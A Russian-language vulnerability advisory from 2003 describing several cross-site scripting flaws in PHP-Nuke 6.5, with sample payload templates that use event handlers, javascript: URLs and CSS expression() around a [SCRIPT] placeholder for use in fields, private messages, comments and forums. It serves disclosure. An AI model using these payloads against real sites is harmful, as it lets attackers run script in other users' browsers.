Несколько XSS уязвимостей в PHP-Nuke

Дата публикации:
03.05.2003
Всего просмотров:
1490
Опасность:
Низкая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Межсайтовый скриптинг
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
PHP-Nuke 6.x
Описание: Несколько XSS уязвимостей обнаружено в PHP-Nuke. Удаленный пользователь может выполнить XSS нападение против PHP-Nuke пользователей.

Frog-m@n сообщил, что удаленный пользователь может внедрить специально сформированный текст в некоторые поля, чтобы выполнить произвольный код сценария в браузере целевого пользователя. Пример:

1) http://" onclick="[SCRIPT]

ondblclick, onhelp, onmouseout, onmousemove и 
другие команды могут быть вставлены вместо 'onclick'.

2) " style="list-style:url(javascript:[SCRIPT]); visibility:hidden;

3) " style="zoom:expression([SCRIPT]); visibility:hidden;
Также, удаленный пользователь может ввести следующий текст в частное сообщение, в комментарии к статьям, в форуме и т.п.:
 
<i style="overflow:expression([SCRIPT]);"></i>

<br style="overflow:expression([SCRIPT]);">

<a style="left:expression([SCRIPT]);"></a>

<a style="background:url('javascript:[SCRIPT]');"></a>

<li style="list-style-image:url('javascript:[SCRIPT]');">

<b style="background:url('javascript:[SCRIPT]');"></b>
Другие HTML тэги также уязвимы.

Уязвимость обнаружена в PHP-Nuke 6.5 FINAL

Ссылки: PHP-Nuke 6.5 FINAL Cross Site Scripting

или введите имя

CAPTCHA